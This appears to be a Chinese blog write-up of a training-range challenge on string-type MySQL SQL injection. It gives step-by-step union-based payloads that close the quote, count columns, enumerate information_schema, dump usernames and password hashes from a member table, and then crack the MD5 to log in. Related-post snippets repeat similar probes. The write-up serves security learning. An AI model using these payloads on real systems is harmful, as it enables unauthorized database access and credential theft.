墨者SQL手工注入漏洞测试(MySQL数据库-字符型)

已于 2022-03-18 18:06:27 修改
阅读量1.1k 收藏 1
点赞数
分类专栏: 墨者 文章标签: sql web安全 安全
于 2022-03-18 16:30:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49780354/article/details/123562976
版权

思路:字符型注入,而且看url就是?id=tingjigonggao字符的类型,那肯定就是要闭合单引号然后union 查询 然后老样子,库,表,列,值

那么问题来了,什么是闭合单引号呢,其实简单说就是

字符型查询语句

select A from b where c ='tingjigonggao(字符串)'

所以我们的注入要先把单引号闭合然后在查询,不然union查询都写在单引号里面就没有意义了

即payload是 ' union select d from e --+

然后我们注入的时候就是

select A from b where c ='' union select d from e --+'

--+是注释后面的意思

总结:注入的时候要判断是字符型还是数字型,是字符型要先闭合单引号

先order by 1找到列数,直到5发现错误,说明4列

' order by 5 --+

 

 找回显

'union select 1,2,3,4--+

'union select 1,database(),3,4--+

'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3,4--+

'union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x73746f726d67726f75705f6d656d626572),3,4--+

 值

'union select 1,(select group_concat(name,password) from stormgroup_member),3,4--+

 解md5

登入

唯熟唯尔
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
APP原实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
墨者学院—SQL手工注入漏洞测试(MySQL数据库-字符
Fisher
12-02 681
写在前面: 最近准备从头再来过一遍sql,所以开始刷墨者学院的题目。 这是一道最简单的字符 联合注入题目 目的:拿到用户与密码 首先寻找注入点,我们发现在维护界面存在id字段可能存在注入。 1.找闭合字符 首先尝试寻找闭合字符,当输入‘时界面加载正确 可能是’,接着测试 and 1=1 界面正确,and1=2 界面错误 没错说明确实闭合字符是单引号。 当然需要–+起到闭合后面闭合字符的作用。 接下来用order by 判断有多少列 order by 1时正确 order by 5 时错误说明共4列
墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符)
weixin_46694260的博客
03-27 3865
0x00 前言 我们都知道,SQL注入分数字字符,我们上次讲的是最基本的数字SQL注入,这次我们就来讲最基本的字符SQL注入。同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清楚原理和方法的话…还是可以看的,大家多多给我点赞吧,哈哈哈哈哈,还是那句话,菜鸟一个,大佬勿喷~ 0x01 过程 首先,还是老样子,我们先看一下题目 这里通过题目我们知道,这次SQL注入字符SQL注入 那我们就进入靶场环境 可以看到和上次一样,有一个登录系统,登录框下面有一个维护新闻轮播框 我们点进去
2021-04-24
qq_53051166的博客
04-24 184
**Sql注入** 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。(我们输入的语句拼接原来的语句后进入数据库)。 1.数字注入:当输入的参数为整时,则有可能存在数字注入漏洞。 判断数字漏洞SQL 注入点:① 先在输入框中输入一个单引号 ’ eg:SELECT * FROM table WHERE id=1’--------页面异常 ② 在输...
SQL手工注入+sqlmap工具测试漏洞测试(MySQL数据库字符注入
全村的希望
11-25 1192
SQL手工注入+sqlmap工具测试漏洞测试(MySQL数据库字符注入
SQL注入原理-字符注入
T1ngSh0w的博客
09-13 8119
SQL注入原理-字符注入
WebShell文件上传漏洞分析溯源
02-22
WebShell文件上传漏洞
0080 APP原实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原源文件
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
11-13
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
spring IOC实现(墨者革离)
12-12
该代码主要用于spring IOC的实现(墨者革离),模拟一个城门叩问的编剧场景
SQL字符注入漏洞.pdf
07-18
配套博客:https://blog.csdn.net/qq_41739364/article/details/94025729
墨者学院SQL手动注入字符
wxdby的博客
12-08 366
点开环境后,点击这里: 会出现: 从题目或者从网址看到只是一个字符注入。首先,我们要判断是否存在判断点 加 ’ and 1=1%23正常.(%23就相当于#,但用#的话结束不了所以就用%23) 存在注入点,然后判断字段数: 判断字段数。order by 5%23报错 order by 4%23,没事: 输入:id=1’ union select 1,2,3,4%23 输入:union se...
iwebsec靶场SQL注入漏洞-字符注入
qq_56041380的博客
03-23 359
字符注入就是注入点的数据类字符字符注入与数字注入的区别就是字符注入要用一对单引号引起来。
SQL手工注入漏洞测试(MySQL数据库-字符)——漏洞记录
chick11的博客
07-16 414
一进来看到一个停机公告,点开查看 发现链接中有字符参数,怀疑存在字符注入 输入 ' and '1'='1 和 ' and '1'='2 测试是否存在注入 ' and '1'='1 ' and '1'='2 发现当输入 'and '1'='2 时,网页发生了错误,确认存在注入。 通过order by 子句判断字段数 order by 1 order by 2 order by 5 order by 4 当order by 4 时网页正常响应,by 5时
sql注入(2) 墨者学院之SQL手工注入漏洞测试MySQL数据库-字符
c10udz的博客
04-12 4096
这里我们可以看到版本是10.2.15,前面说过MySQL5.0版本以上有个自带的information_shema数据库,利用这个数据库可以查到整个数据库的结构,不然就只能盲猜了。//注释:(1)information_schema.tables表示information_schena这个数据库下的表,在MySQL中【.】代表下一级。利用'order by 任意数字 %23去判断,得到4(结尾加%23的原因:在一个语句结尾时,需要用#结尾,而#的url编码就是%23)table_schema:数据库名。
墨者学院—— SQL手工注入漏洞测试(MySQL数据库-字符)
Lollipop_zhi的博客
02-26 2210
1.启动靶场环境,老地方点击 2.看地址栏,合理怀疑是否有注入点 这里插入知识点——怎么判断有注入点? 一般方法: and 1=1 正常 and 1=2 错误 背后的原理是逻辑运算 真且真=真;真且假=假 所以只需要让它能判断出假,就可以合理怀疑存在注入点 比如:id=jhfjkashlk(瞎打的) 改成 id=jhdak 显示异常,有注入点 3.尝试简单使用order by 猜解列名数量,不成功 order by 之后我才判断了单引号闭合,也就是id=tingjigon
常用SQL命令
最新发布
wenxiaoba的博客
05-02 1002
常用SQL语句使用说明和示例
SQL Server的基本操作示例
weixin_58566539的博客
04-29 518
SQL Server的基本操作示例
SQL底层执行过程
qq_14886109的博客
04-28 916
SQL底层执行过程,INNODB,二阶段提交
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

唯熟唯尔

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值